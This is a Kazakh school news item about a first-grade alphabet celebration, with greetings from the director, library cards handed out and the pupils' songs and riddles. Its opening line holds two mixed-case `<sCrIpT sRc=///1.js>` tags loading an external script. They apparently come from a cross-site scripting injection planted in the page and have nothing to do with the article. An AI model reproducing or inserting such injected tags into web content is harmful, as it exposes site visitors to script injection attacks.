<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
21.11.2017
«Тілашармерекесі»
«Тілашармерекесі» бірінші сынып оқушылары үшін өмірдегі ең маңызды кезең шығар, сірә. Бірінші сынып оқушылары бұл мерекеге ұзақта, тырмысып дайындалды, сондықтан да ерекше қобалжу мен қуанышта бірдей сезілді. Өйткені мереке тек қанасолар үшін арналған. Мереке жақындаған сайын әр бала өз анасын іздей бастады. Сонымен мереке басталды! Біздің қуанышты бөлісуге мектеп әкімшілігі, мұғалімдер, ата-аналар келді. Олар қол соғып басты кейіпкерлерді қарсы алды. Бұл айтулы күнмен мектеп директоры Смағұлова К.Д., ата-аналар комитетінің төрайымы Алтыбаева Роза балаларды құттықтап, жыл лебіздерін білдірді. Мектеп кітапханашысы Хрусталева Т.А. балаларға оқу билеттерін табыстап, тәттілер таратып, кітапханаға қонаққа шақырды. Ал бірінші сынып оқушылары болса екі айда алған білімдерін ортаға салып: қызықты тапсырмалар орындап, жұмбақтар шешіп, өлееңдер оқып, ән салды.
Бұлар өте талғампаз, көңілді және тапқыр балалар. Олар бірге еңбектеніп, көңіл көтеріп, оқуды жақсы оқитын балалар. Мерекенің соңында ата-аналар бірінші сынып оқушыларына мерекелік тортты тарту етті.